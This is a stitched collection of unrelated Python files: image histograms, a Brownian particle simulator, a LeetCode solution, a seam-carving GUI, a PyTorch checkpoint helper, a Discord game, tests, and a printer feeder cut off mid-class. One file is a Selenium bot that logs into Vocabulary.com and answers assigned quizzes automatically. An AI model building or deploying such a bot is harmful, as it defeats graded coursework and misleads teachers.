actual = cipher_ajz2123.cipher(example, shift)
assert actual == expected
|
import cv2 as cv
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
img = cv.imread('data/pic1.jpg')
mpl.use('tkagg')  # select the Tk backend once, before any plotting
colors = ('b', 'g', 'r')
x = np.arange(256)
for i, col in enumerate(colors):
    # per-channel histogram: 256 bins over pixel values [0, 256)
    hist = cv.calcHist([img], [i], None, [256], [0, 256])
    plt.plot(x, hist, color=col)
plt.title('Color Histogram')
plt.xlabel('Bins')
plt.ylabel('# of pixels')
plt.show()
|
import numpy as np
import pandas as pd
class particle_system:
'''
    Keeps track of the system's size, state and the particles in it.
    Constructor takes a list of length equal to the system's dimension.
    For [d1,d2,...,dk] the domain on which the particles can move is [0,d1]x[0,d2]x ... x[0,dk]
'''
def __init__(self,grid,creation):#grid : array of length equal to dimension
self.grid=grid
self.particles=[]
self.dim=len(self.grid)
self.max_id=0
self.__class__.creation=creation
'''
n : number of particles to insert
update_pos : a function which is passed to the constructor of particle, used for evolving it in time (see description of particle class for details)
update_intensity : as above
start_pos : if None, then generates randomly, otherwise a list of length n containing the initial positions as lists of length self.dim
intensity : if None, then set to 1, otherwise a list of length n
'''
def insert_particles(self,n,update_pos,update_intensity,start_pos=None,intensity=None):
if start_pos is None:
pos_data=[np.random.uniform(low=0, high=self.grid[i], size=n) for i in range(self.dim)]
start_pos=[[pos_data[j][i] for j in range(self.dim)]for i in range(n)]
if intensity is None:
intensity=[1 for i in range(n)]
for i in range(n):
self.particles.append(particle(self.grid,start_pos[i],update_pos,intensity[i],update_intensity,id=self.max_id+i))
self.max_id+=n
'''
updates the state of each particle in the system
'''
    def evolve(self,dt):
        # iterate over a copy: removing from a list while iterating it skips elements
        for p in list(self.particles):
            p.evolve(dt)
            if p.intensity==0:#remove if intensity drops to 0
                self.particles.remove(p)
        self.creation(dt)
def positions(self):
return [p.pos for p in self.particles]
def intensities(self):
return [p.intensity for p in self.particles]
class particle:
'''
grid : as in particle_system
start_pos : initial position in a list
update_pos : assigned as a method of the class so the arguments it takes are : instance of class particle, time increment
    intensity : initial intensity
    update_intensity : as in update_pos. Note that the current method to make a particle vanish is to set its intensity to 0 so this method should handle that
'''
def __init__(self,grid,start_pos,update_pos,intensity,update_intensity,id):
self.grid=grid#dimensions of the space it's restricted to
self.dim=len(self.grid)
self.pos=start_pos#current position
self.__class__.update_pos=update_pos
self.intensity=intensity#current intensity
self.__class__.update_intensity = update_intensity
self.id=id
def evolve(self,dt):
self.pos=self.update_pos(dt)
self.intensity=self.update_intensity(dt)
'''
checks if a point is contained in a grid
'''
def inside_grid(pos,grid):#assume grid has leftmost bottom corner in 0, check if a given point is inside of it
inside_dimensions=[pos[i]>=0 and pos[i]<=grid_dim for i,grid_dim in enumerate(grid)]
return all(inside_dimensions)
'''
brownian motion of a single particle in n dimensions
part : particle
dt: time increment
D : diffusion coefficient
drift : list of length equal to dimension if we want to have a drift in the motion
Note that when passing this to a constructor we need to specify the D and drift parameter with a lambda i.e.
pass lambda x,y : brownian_update(x,y,some_D,some_drift)
'''
def brownian_update(part,dt,D,drift=None):
if drift is None:
drift=[0]*part.dim
mean=[dt*d for d in drift]
cov=np.identity(part.dim)*dt*D*2#the 2 term appears because I think that's the 'true' variance formula in Brownian motion but D may as well just be any number, not the diffusion coeff
dr = np.random.multivariate_normal(mean, cov, 1).T
if (any([np.abs(dr[i][0])>grid_dim/2 for i,grid_dim in enumerate(part.grid)])):#this is just bad code but we're unlikely to need more dimensions anytime soon
print("The time step in brownian motion seems to be too large relative to grid size")#just to see if I'm doing anything stupid
pos=part.pos
new_pos=list(map(sum, zip(pos, [dr[i][0] for i,d in enumerate(dr)])))
if inside_grid(new_pos,part.grid):
return new_pos
else:#need to figure out where and when it intersects the boundary. For now let's just resample
return brownian_update(part,dt,D,drift)
'''
Takes an output file of thunderstorm in csv, frame number (starting from 1), and returns two lists of positions and intensities of every observed particles in a given frame
'''
def thunderstorm_extract(directory,frame_id):
df=pd.read_csv(directory)
frame=df.loc[df['frame'] == frame_id]
data=frame[['x [nm]','y [nm]','intensity [photon]']]
pos=[]
intensity=[]
for row in data.iterrows():
pos.append([row[1][0],row[1][1]])
intensity.append(row[1][2])
return pos,intensity
def placeholder_intensity_update(part,dt,mean,variance=None,threshold=None):
if variance is None:
variance=(dt)**2
if threshold is None:
threshold=0.1*mean#if intensity drops below then it disappears
#print(mean,variance,part.intensity)
intensity_change=np.random.normal(mean-part.intensity, variance)
new_int=part.intensity+intensity_change
#print(part.intensity)
if new_int<threshold:
new_int=0
return new_int
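
# A minimal usage sketch (added; not part of the original module). The grid
# size, particle count and parameter values below are illustrative only.
if __name__ == '__main__':
    system = particle_system(grid=[100.0, 100.0],
                             creation=lambda self, dt: None)  # no particle creation
    system.insert_particles(n=5,
                            update_pos=lambda part, dt: brownian_update(part, dt, D=1.0),
                            update_intensity=lambda part, dt: placeholder_intensity_update(part, dt, mean=10.0))
    for _ in range(10):
        system.evolve(0.01)
    print(system.positions())
    print(system.intensities())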
|
# 2021 June 5 10:13 - 10:59
# Intuitively, we need to do cN // 26, and take the remainder and see which char
# it corresponds to. However, there is an intricacy:
#
# cN % 26 gives us a number in [0, 25], what we want would be something in [1,
# 26].
#
# Notice here we should not simply add 1 to this [0, 25] result, as that
# effectively alters the mapping: for something that gives us 0 on the first
# digit, we should make it 26 and map it to "Z", instead of having it added by
# 1 and mapped to "A".
#
# So the correct way to go about it is to tear down a 26 from the quotient and
# make the remainder 26, in the case when cN % 26 == 0. The quotient and
# remainder are then altered from (cN // 26, 0) to (cN // 26 - 1, 26).
# The rest is to offset the ASCII value of "A" by 1, and break at a proper time.
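#
# Worked example (added for clarity): columnNumber = 52.
#   52 % 26 == 0 -> quotient, rem = (52 // 26 - 1, 26) = (1, 26) -> digit "Z"
#   1 % 26 == 1  -> quotient, rem = (0, 1)                       -> digit "A"
# Digits are prepended, so the result is "AZ".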
class Solution:
def convertToTitle(self, columnNumber: int) -> str:
ans = ""
while True:
if columnNumber % 26 != 0:
columnNumber, rem = columnNumber // 26, columnNumber % 26
else:
columnNumber, rem = columnNumber // 26 - 1, 26
ans = chr(rem + ord("A") - 1) + ans
if columnNumber < 1: break
return ans
if __name__ == "__main__":
print(Solution().convertToTitle(1))
print(Solution().convertToTitle(28))
print(Solution().convertToTitle(701))
print(Solution().convertToTitle(2147483647))
|
# -*- coding: utf-8 -*-
__version__ = "1.2.4"
import os
import platform
from selenium import webdriver
import time
from unidecode import unidecode
import urllib2
import httplib
import json
import sys
import speech_recognition as sr
import audioop
import urllib
from update import update
from pydub import AudioSegment
from bs4 import BeautifulSoup
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from os import path
_author_ = "Sayan Bhowmik and lefela4(Felix)"
fo = open('cred')
fo_ = open('voclist')
r = sr.Recognizer()
html = ''
skipAudio = 0
tries = 0
chrome_options = webdriver.ChromeOptions()
chrome_options.add_experimental_option(
"excludeSwitches", ["ignore-certificate-errors"])
check_driver_version = 1
driver = webdriver.Chrome(chrome_options=chrome_options)
#driver = webdriver.Firefox(capabilities=firefox_capabilities,firefox_binary=binary, firefox_options = opts)
#====================================================================================================================================================#
login_page = "https://www.vocabulary.com/login/"
my_username = fo.readlines()[0]
fo.seek(0, 0)
my_pass = fo.readlines()[1]
############################################################################
# Link to assignment [For Demo]
url = fo_.readlines()[0] #YOUR URL HERE
##############################################################################
print "Voc at " + url
a_page = url
lastAudioLen = 0
print "[+] STARTING VOCABULARY BOT"
usr = ""
base = ""
old_html = ""
source = ""
soup = ""
op1 = ""
op2 = ""
op3 = ""
op4 = ""
options = []
word = ""
#====================================================================================================================================================#
def main():
'''
# Ignore this section, I actually ended up making a keygen to protect it from the hands of students at my University
ck = 0
if(platform.system() == "Linux" or platform.system() == "Darwin" and len(key) >= 10 and ck == 0):
base = platform.uname()[0][0]
usr = platform.uname()[1][0]
u = key[-2:][0]
b = key[-2:][1]
if(usr == u and base == b):
time.sleep(2)
login();
assignment();
ck += 1
if(platform.system() == "Windows" and len(key) >= 10 and ck == 0):
usr = os.getenv('username')[2]
base = platform.uname()[0][0]
u = key[-2:][0]
b = key[-2:][1]
if(usr == u and base == b):
time.sleep(2)
login();
assignment();
ck += 1
'''
time.sleep(2)
login()
assignment()
#====================================================================================================================================================#
def login():
driver.get(login_page)
time.sleep(3)
print "Attemp to login in"
username = driver.find_element_by_name("username")
password = driver.find_element_by_name("password")
username.send_keys(my_username)
password.send_keys(my_pass)
driver.find_element_by_class_name("green").click()
time.sleep(1)
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
#====================================================================================================================================================#
def assignment():
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
time.sleep(3)
driver.get(a_page)
time.sleep(2)
driver.execute_script("window.scrollTo(100, 100);")
option_high_score = scrapper()
click_op(option_high_score)
print "[+] STARTING VOCABULARY BOT [1]"
print "\a\a\a\a\a\a\a"
#====================================================================================================================================================#
def speech_to_text(audio):
song = AudioSegment.from_mp3("audio.mp3")
song.export("audio.wav", format="wav") # Is the same as:
time.sleep(2)
with sr.AudioFile("audio.wav") as source:
audio = r.record(source)
try:
text = r.recognize_google(audio)
print("You said " + text)
if(text == "tents"):
text = "dense"
if(text == "Tents"):
text = "dense"
if(text == "Bode"):
text = "mode"
if(text == "lute"):
text = "loot"
if(text == "heroin"):
text = "harrowing"
if(text == "and you were"):
text = "inure"
return text
except sr.UnknownValueError:
print("Could not understand audio")
except sr.RequestError as e:
print("Could not request results; {0}".format(e))
def scrapper():
try:
alertObj = driver.switch_to.alert
alertObj.accept()
print "Alert detected!"
driver.get(url)
except Exception as e:
print("No alert found!")
driver.execute_script("""window.location.reload();""")
time.sleep(2)
global html
global source
global old_html
global soup
global op1
global op2
global op3
global op4
global options
global word
global lastAudioLen
try:
html = driver.execute_script("return document.getElementsByTagName('body')[0].innerHTML;")
except Exception as e:
print("Error: " + str(e))
time.sleep(1)
driver.get(url)
source = unidecode(html)
old_html = source
time.sleep(1)
soup = BeautifulSoup(source, "html.parser")
driver.execute_script("function getElementByXpath(path) { return document.evaluate(path, document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue; }; window.getElementByXpath = getElementByXpath;")
try:
c = driver.find_element_by_class_name("wrapper").find_element_by_class_name("instructions").text
if(c == "choose the best picture for"):
driver.get(url)
time.sleep(3)
return 5
except Exception as e:
print "No img detected!"
try:
c = driver.find_element_by_class_name('next')
if(c):
nextQ = driver.find_element_by_class_name('next')
nextQ.click()
time.sleep(1)
return 5
except Exception as e:
eee = str(e)
print "No button detected! "
try:
isAudio = 0
try:
length_check = len(
soup.findAll('div', attrs={'class': 'instructions'})[0].text.split(" "))
if(length_check == 0):
isAudio = 1
except Exception as e:
isAudio = 1
print "AUDIO!"
c_list = driver.execute_script('return document.getElementsByClassName("spellit")') #driver.find_elements_by_class_name('spellit')
len_list = len(c_list) - 1
if(isAudio):
lastAudioLen = len_list - 1
print "AUDIO: " + str(len_list)
print str(c_list)
c = c_list[len_list]
if(c and lastAudioLen != len(c_list)):
print "SPEACH DETECTED! LIST: " + str(len_list)
if(skipAudio):
time.sleep(1)
text_area = driver.find_element_by_class_name('wordspelling')
text_area.send_keys("Life is good (LG)")
time.sleep(1)
try:
c.click()
time.sleep(1)
c.click()
time.sleep(1)
c.click()
time.sleep(1)
element2 = driver.find_element_by_class_name('surrender')
element2.click()
time.sleep(2)
element3 = driver.find_element_by_class_name('next')
element3.click()
time.sleep(1)
element4 = driver.find_element_by_class_name('next')
element4.click()
driver.get(url)
time.sleep(3)
except Exception as e:
a = str(e)
print "Error at: " + a
else:
try:
lastAudioLen = len(c_list)
audio = driver.find_element_by_class_name('playword')
#link_ = driver.execute_script("""return jQuery(".challenge-slide").data().audio;""")
link_ = driver.execute_script("""var list = document.getElementsByClassName("challenge-slide"); var obj = list[list.length - 1]; return jQuery(obj).data().audio;""")
link = ''.join(["https://audio.vocab.com/1.0/us/", link_, ".mp3"])
time.sleep(1)
print link
testfile = urllib.URLopener()
testfile.retrieve(link, "audio.mp3")
print "Downloading..."
time.sleep(2)
text = speech_to_text("audio.mp3")
time.sleep(1)
text_area_list = driver.find_elements_by_class_name('wordspelling')
text_area = text_area_list[len(text_area_list) - 1]
text_area.send_keys(text)
time.sleep(2)
c = c_list[len_list]
c.click()
time.sleep(2)
element4 = driver.find_element_by_class_name('next')
element4.click()
time.sleep(1)
except Exception as e:
a = str(e)
print "Error at: " + a
return 5
except Exception as e:
eee = str(e)
print "No speach detected!"
try:
length_check = len(
soup.findAll('div', attrs={'class': 'instructions'})[0].text.split(" "))
if(length_check != 0):
word = driver.find_element_by_xpath("//strong[1]").text
if(str(word) == ""):
word = driver.find_element_by_class_name("sentence").find_element_by_xpath("//strong[1]").text
dic_exceptions = ['and', 'up', 'as', 'if', 'the', 'who', 'has', 'a', 'an', 'to', 'for', 'from', 'is', 'where', 'when', 'why',
'how', 'which', 'of', 'one', "one's", 'or', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten']
#========================== Options ==========================#
val1 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='1A']").text""")
val2 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='2B']").text""")
val3 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='3C']").text""")
val4 = driver.execute_script("""return window.getElementByXpath("//a[@accesskey='4D']").text""")
op1 = (val1 + "\n").rstrip('\n').split(" ")
op2 = (val2 + "\n").rstrip('\n').split(" ")
op3 = (val3 + "\n").rstrip('\n').split(" ")
op4 = (val4 + "\n").rstrip('\n').split(" ")
final = []
options = [op1, op2, op3, op4]
#========================== Options ==========================#
op_st = ''.join(["Options: ", str(options)])
#print op_st
for option in options:
for item in option:
for x in dic_exceptions:
if x == item:
p = option.index(x)
option.pop(p)
            #========================== Options Rating ==========================#
s_link = "https://www.vocabulary.com/dictionary/"
link = s_link + word
html = urllib2.urlopen(link)
soup = BeautifulSoup(html, "html.parser")
if(word == "________"):
return 0
source_dic2 = None
print "Word: " + word
try:
test = soup.find('div', {"class" : "definitionsContainer"})
source_dic2 = unidecode(test.prettify())
except Exception as e:
eee = str(e)
print "Error" + eee
return 0
a = 0
rate_arr = []
cpy_rate_arr = []
for option in options:
for item in option:
if item in source_dic2:
a += 1
print ("{0} -> {1}".format(option, a))
rate_arr.append(a)
a = 0
            #========================== Options Rating ==========================#
cpy_rate_arr = sorted(rate_arr)
x_pos = cpy_rate_arr[len(cpy_rate_arr) - 1]
x_pos_2 = cpy_rate_arr[len(cpy_rate_arr) - 2]
choice = rate_arr.index(max(rate_arr))
if (x_pos == x_pos_2):
print "No position found."
h = choice
print h
return h
else:
            driver.quit()
            print "Error: length_check is less than or equal to 0"
except Exception as e:
print e
def click_op(i):
try:
if(i == 5):
time.sleep(1)
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
return
op = i + 1
ar = ["", "A", "B", "C", "D"]
high = str(op)
b = ''.join([high, ar[op]])
element = driver.find_element_by_xpath('//a[@accesskey="' + b + '"]')
try:
element.click()
except Exception as e:
a = str(e)
print "Error at: " + a
try:
nextQ = driver.find_element_by_class_name('next')
nextQ.click()
except Exception as e:
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
a = str(e)
print "Error quitting... " . a
time.sleep(1)
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
except Exception as e:
option_high_score = scrapper()
time.sleep(1)
click_op(option_high_score)
a = str(e)
print "Error quitting... " . a
#====================================================================================================================================================#
def autoUpdate(): #main()
updated = update("https://raw.githubusercontent.com/lefela4/Vocabulary.com-AutoBot/master/src/vocab_Demo1.py", __version__)
if(updated == 0):
# Nothing to update
main()
elif(updated == 1):
# The file have been updated!
print("Please restart the program!")
elif(updated == 2):
# Error
print("Sorry, an error occurred while preparing the installation. Please go in https://github.com/lefela4/Vocabulary.com-AutoBot/issues and create a new issue with the screen shot of the error!")
autoUpdate()
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os.path
from scipy.misc import imread
import numpy as np
from PyQt4 import QtCore, QtGui, uic
from seam_carve import seam_carve
Ui_MainWindow, QtBaseClass = uic.loadUiType('./guiwindow.ui')
class Viewer(QtGui.QWidget):
def __init__(self, parent=None):
super(QtGui.QWidget, self).__init__(parent)
self.INIT_IMAGE = np.ones([350, 350, 3], np.uint8) * 255
self.INIT_MASK = np.zeros(self.INIT_IMAGE.shape, np.int8)
self.SAVE_COLOR = np.array([0, 127, 0])
self.DEL_COLOR = np.array([127, 0, 0])
self.setAttribute(QtCore.Qt.WA_StaticContents)
self.image = self.INIT_IMAGE.copy()
self.n_rows = self.INIT_IMAGE.shape[0]
self.n_cols = self.INIT_IMAGE.shape[1]
self.qimage = QtGui.QImage(self.image.data, self.n_cols,
self.n_rows,
QtGui.QImage.Format_Indexed8)
self.mask = self.INIT_MASK.copy()
def paintEvent(self, event):
painter = QtGui.QPainter(self)
rect = event.rect()
painter.drawImage(rect, self.qimage, rect)
def updateImage(self):
expanded_mask = (self.mask == 1)[:, :, np.newaxis] * self.SAVE_COLOR + \
(self.mask == -1)[:, :, np.newaxis] * self.DEL_COLOR
buffer = np.require(self.image + expanded_mask, np.uint8, ['A', 'O', 'C'])
buffer[self.image.astype(np.uint16) + expanded_mask > 255] = 240
self.qimage = QtGui.QImage(buffer.data, self.n_cols, self.n_rows,
buffer.shape[1] * 3, QtGui.QImage.Format_RGB888)
def loadImage(self, img, mask = None):
self.image = img
self.qimage = QtGui.QImage(img.data, img.shape[1], img.shape[0], QtGui.QImage.Format_RGB888)
self.n_rows, self.n_cols, _ = img.shape
self.resize(self.n_cols, self.n_rows)
if mask is None:
self.mask = np.zeros(img.shape[:2], np.int8)
else:
self.mask = mask.copy()
self.updateImage()
self.update()
def clearMask(self):
self.mask.fill(0)
self.updateImage()
self.update()
def changeMask(self, pos, value, radius):
for row_i in range(-radius, radius):
for col_i in range(-radius, radius):
row = pos.y() + row_i
col = pos.x() + col_i
if row >= 0 and row < self.n_rows and \
col >= 0 and col < self.n_cols:
self.mask[row, col] = value
self.updateImage()
self.update()
def handleScaleBtn(self, btn):
        # Button index is a bit field: bit 0 = large step (10 seams) vs single,
        # bit 1 = expand vs shrink, bit 2 = vertical vs horizontal.
if btn & 4:
mode = 'vertical '
else:
mode = 'horizontal '
if btn & 2:
mode += 'expand'
else:
mode += 'shrink'
image = self.image.copy()
mask = self.mask.copy()
if btn & 1:
seam_count = 10
else:
seam_count = 1
for i in range(seam_count):
image, mask, _ = seam_carve(image, mode, mask=mask)
self.n_rows, self.n_cols, _ = image.shape
self.image = np.require(image, np.uint8, ['A', 'O', 'C'])
if mask is None or not mask.shape == image.shape[:2]:
self.mask = np.zeros([self.n_rows, self.n_cols], np.int8)
else:
self.mask = mask.astype(np.int8).copy()
del image, mask
self.updateImage()
self.update()
self.parent().alignToImage(self.image.shape)
class Gui(QtGui.QMainWindow, Ui_MainWindow):
def __init__(self, cfgpath):
QtGui.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.configpath = cfgpath
self.paint = Viewer(self)
self.setupUi(self)
self.loadButton.clicked.connect(self.loadImage)
self.maskClearButton.clicked.connect(self.paint.clearMask)
self.brushSizeSB.valueChanged.connect(self.brushSizeChange)
btnlist = [self.horDownBtn, self.horDownLargeBtn, self.horUpBtn, self.horUpLargeBtn,
self.vertDownBtn, self.vertDownLargeBtn, self.vertUpBtn, self.vertUpLargeBtn]
sigmap = QtCore.QSignalMapper(self)
for i in range(len(btnlist)):
self.connect(btnlist[i], QtCore.SIGNAL("clicked()"), sigmap, QtCore.SLOT("map()"))
sigmap.setMapping(btnlist[i], i)
self.connect(sigmap, QtCore.SIGNAL("mapped(int)"), self.paint.handleScaleBtn)
self.alignToImage(self.paint.image.shape)
self.brushsize = self.brushSizeSB.value()
self.imagepath = ''
def mouseMoveEvent(self, event):
ex = event.x() - self.paint.x()
ey = event.y() - self.paint.y()
pos = QtCore.QPoint(ex, ey)
if ex >= 0 and ex < self.paint.width() and \
ey >= 0 and ey < self.paint.height():
if event.buttons() & QtCore.Qt.LeftButton:
if self.brushSaveRB.isChecked():
value = 1
else:
value = -1
self.paint.changeMask(pos, value, self.brushsize)
elif event.buttons() & QtCore.Qt.RightButton:
self.paint.changeMask(pos, 0, self.brushsize)
return QtGui.QMainWindow.mouseMoveEvent(self, event)
def mousePressEvent(self, event):
return self.mouseMoveEvent(event)
def alignToImage(self, shape):
self.resize(shape[1] + self.controlFrame.width(), shape[0])
self.paint.setGeometry(self.controlFrame.width(), 0, shape[1], shape[0])
self.controlFrame.setGeometry(0, 0, self.controlFrame.width(), shape[0])
def brushSizeChange(self):
self.brushsize = self.brushSizeSB.value()
def loadImage(self, filename=''):
if type(filename) != str or filename == '':
filename = QtGui.QFileDialog.getOpenFileName(self, 'Open file',
QtCore.QDir.currentPath())
if filename != '':
img = imread(filename)
self.alignToImage(img.shape)
fname,fext = os.path.splitext(filename)
maskpath = fname+'_mask'+fext
mask = None
if os.path.isfile(maskpath):
mask_img = imread(maskpath)
if (np.array_equal(mask_img.shape[:2],img.shape[:2])):
mask = ((mask_img[:,:,0]!=0)*(-1) + (mask_img[:,:,1]!=0)).astype(np.int8)
self.paint.loadImage(img,mask)
self.imagepath = filename
def loadParams(self, params):
if params[0] != '' and os.path.isfile(params[0]):
self.loadImage(params[0])
self.brushsize = params[1]
self.brushSizeSB.setValue(params[1])
def saveParams(self):
params = (self.imagepath, self.brushsize)
saveConfig(self.configpath, params)
def loadConfig(filename):
    # Defaults (assumed) in case a key is missing from the config file
    imgpath, bsize = '', 1
    with open(filename) as fhandle:
        for line in fhandle:
            if len(line) != 0 and line[0] != '#':
                if line[:6] == 'image=':
                    imgpath = line[6:].rstrip()
                elif line[:6] == 'brush=':
                    bsize = int(line[6:])
    return (imgpath, bsize)
def saveConfig(filename, params):
with open(filename, 'w') as fhandle:
print('image=%s\nbrush=%d' % params, file=fhandle)
app = QtGui.QApplication.instance()
if not app:
app = QtGui.QApplication(sys.argv)
app.aboutToQuit.connect(app.deleteLater)
configpath = os.path.dirname(os.path.abspath(__file__)) + '/gui.config'
window = Gui(configpath)
app.aboutToQuit.connect(window.saveParams)
window.show()
if os.path.isfile(configpath):
params = loadConfig(configpath)
window.loadParams(params)
if len(sys.argv) > 1:
window.loadImage(sys.argv[1])
app.exec_()
|
import torch
from functions import create_model
class Checkpoint:
def __init__(self, model_state_dict, class_to_idx, arch, hidden_units):
self.model_state_dict = model_state_dict
self.class_to_idx = class_to_idx
self.architecture = arch
self.hidden_units = hidden_units
def save_checkpoint(model, class_to_idx, save_directory, arch, hidden_units):
checkpoint = Checkpoint(model.state_dict(), class_to_idx, arch, hidden_units)
torch.save(checkpoint, save_directory)
def load_checkpoint(checkpoint_directory):
checkpoint = torch.load(checkpoint_directory)
model = create_model(checkpoint.architecture, checkpoint.hidden_units)
model.load_state_dict(checkpoint.model_state_dict)
model.class_to_idx = checkpoint.class_to_idx
return model
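
# A minimal usage sketch (added; not part of the original module). The
# architecture name, hidden-unit count and file path are illustrative only:
#
#   model = create_model('vgg16', 512)
#   # ... train the model and collect class_to_idx from the dataset ...
#   save_checkpoint(model, class_to_idx, 'checkpoint.pth', 'vgg16', 512)
#   model = load_checkpoint('checkpoint.pth')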
|
# Copyright 2013-2016 Luc Saffre
# License: BSD (see file COPYING for details)
"""
This is used by tests/__init__.py
"""
from .settings import *
class Site(Site):
languages = 'en de fr et nl pt-br es'
project_name = 'lino_std'
SITE = Site(globals())
"""
This Site instance will normally be replaced by an instance
in a local settings.py file
"""
|
"""
Módulo para funciones auxiliares del juego 'Piedra, Papel o Tijeras'.
"""
from random import choice
from time import sleep
from typing import Optional
from discord import Interaction
from ..archivos import DiccionarioStats, cargar_json, guardar_json
from ..constantes import PROPERTIES_PATH
from .condicion_partida import Condicion
def decidir_partida_ppt(eleccion: str,
victoria: str,
derrota: str,
empate: str) -> Optional[Condicion]:
"""
Decide el resultado de una partida de 'Piedra, Papel o Tijeras'.
Si 'eleccion' es igual que 'victoria', entonces se devuelve un '0'
Si 'eleccion' es igual que 'derrota', entonces se devuelve un '1'.
Si 'eleccion' es igual que 'empate', entonces se devuelve un '2'.
Si no es igual que ninguna, se devuelve 'None'.
"""
condicion_victoria = None
if eleccion == victoria:
condicion_victoria = Condicion.VICTORIA
elif eleccion == derrota:
condicion_victoria = Condicion.DERROTA
elif eleccion == empate:
condicion_victoria = Condicion.EMPATE
return condicion_victoria
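# A small example (added; not part of the original module): the player chose
# rock, so scissors would be a win, paper a loss and rock a tie; if the bot's
# pick is "PIEDRA":
#   decidir_partida_ppt("PIEDRA", victoria="TIJERAS", derrota="PAPEL", empate="PIEDRA")
#   -> Condicion.EMPATE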
async def jugar_partida_ppt(eleccion: str,
author_id: str,
stats_juego: DiccionarioStats,
interaction: Interaction) -> None:
"""
Juega una partida de 'Piedra, Papel o Tijeras'.
"""
opciones = ("PIEDRA", "PAPEL", "TIJERAS")
eleccion = eleccion.upper()
opcion_elegida = choice(opciones)
piedra, papel, tijeras = opciones
    msg = interaction.message  # may be None
contenido_mensaje = f"¡Yo elegí `{opcion_elegida}`!"
if msg is not None and msg.components:
mensaje_partida = await msg.edit(content=contenido_mensaje,
view=None)
else:
mensaje_partida = await interaction.channel.send(content=contenido_mensaje)
    sleep(2.0)  # suspense...
stats_jugador = stats_juego.get(author_id, [0, 0, 0])
match eleccion:
case "PIEDRA":
cond_partida = decidir_partida_ppt(opcion_elegida, tijeras, papel, piedra)
case "PAPEL":
cond_partida = decidir_partida_ppt(opcion_elegida, piedra, tijeras, papel)
case "TIJERAS":
cond_partida = decidir_partida_ppt(opcion_elegida, papel, piedra, tijeras)
case _:
cond_partida = None
if cond_partida is not None:
stats_jugador[cond_partida.value] += 1
stats_juego[author_id] = stats_jugador
propiedades = cargar_json(PROPERTIES_PATH)
propiedades["stats_ppt"] = stats_juego
guardar_json(propiedades, PROPERTIES_PATH)
contenido = None
match cond_partida:
case Condicion.VICTORIA:
contenido = "**¡Me ganaste!** ¡No, exijo otra!"
case Condicion.DERROTA:
contenido = "**¡Te gané!** ¡Tomá!"
case Condicion.EMPATE:
contenido = "**¡Es empate!**\n\n¿...pará, empate? ¡Otra!"
victorias, derrotas, empates = stats_jugador
aviso_stats = (f"**Con esto,** llevás `{victorias}` Victorias, `{derrotas}` Derrotas " +
f"y `{empates}` Empates.")
await mensaje_partida.edit(content=f"Vos elegiste `{eleccion}` y yo `{opcion_elegida}`:" +
f"\n\n{contenido}\n\n{aviso_stats}",
delete_after=10.0,
view=None)
|
from unittest import TestCase
from tree_node import TreeNode
from unique_binary_search_trees_two import Solution
class TestUniqueBinarySearchTreesTwo(TestCase):
def test_zero(self):
self.assertEqual(
[],
Solution().generateTrees(0)
)
def test_one(self):
self.assertEqual(
[TreeNode(1)],
Solution().generateTrees(1)
)
def test_two(self):
first_tree = TreeNode(1)
first_tree.right = TreeNode(2)
second_tree = TreeNode(2)
second_tree.left = TreeNode(1)
self.assertEqual(
[first_tree, second_tree],
Solution().generateTrees(2)
)
|
import anvil.facebook.auth
import anvil.google.auth, anvil.google.drive
from anvil.google.drive import app_files
import anvil.microsoft.auth
import anvil.users
import anvil.server
import anvil.tables as tables
import anvil.tables.query as q
from anvil.tables import app_tables
from .section import section
from .markdown import markdown
from .chart import chart
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from os.path import dirname, realpath, sep, pardir
import sys
import qrcode
from io import BytesIO
import time
import urllib2 # In python3 this is just urllib
from StringIO import StringIO
import json
from datetime import datetime
from PIL import ImageFont, ImageDraw, Image
from escpos.printer import Serial, Usb
"""Feeder for the hamsterPrinter a SoMe etc. POS printer"""
class hamster:
"""Basic stuff like reading the cfg and other common stuff"""
def readConfig(self, cfg='hamsterPrinter.cfg'):
"""Write newlines and optional cut paper"""
from configparser import ConfigParser
parser = ConfigParser()
parser.read(cfg)
return parser
def pinAgain(self, weatherType, dbObj, chuteLengthPx, cfg):
"""Function to check if a "pinned" message/whatever should be printed again"""
printFeeds = [ i.lower() for i in cfg.get('printer', 'printFeeds').split()]
printout = []
# If the printer is too much behind we wait with the pinning
try:
dbWeather = dbObj.cursor()
dbWeather.execute("""SELECT srcType.shortName, printout.height
FROM printout INNER JOIN srcType
ON srcType.id = printout.srcType
ORDER BY printout.id DESC LIMIT 100""")
px=0
while True:
try:
row = dbWeather.fetchone()
# If there are no more rows to fetch
if row == None:
break
srcType, height = row
# Only include sources that are active on the printer
if srcType.lower() not in printFeeds and 'all' not in printFeeds:
continue
if height is None:
print("""The printer is behind with its printing. Waiting with pinning message of type %s""" % weatherType)
return False
else:
px += height
if px > chuteLengthPx:
# We have fetched enough now
break
printout.append({"srcType": srcType, "height": height})
except Exception, e:
print(e)
break
dbWeather.close()
except Exception, e:
print(e)
pass
# Find out if it is about time to print something new
aboutTime = True
for p in printout:
if p['srcType'] == weatherType:
aboutTime = False
# If nothing has been printed yet
        if len(printout) == 0:
print printout
print "Nothing has been printed by the printer so we are not pinning anything yet."
aboutTime = False
if aboutTime:
print """The pinned message of type %s has been swapped out of the chute. Lets add it again!""" % weatherType
return True
else:
return False
class printout:
"""Print stuff from Twitter"""
def __init__(self, printerConf):
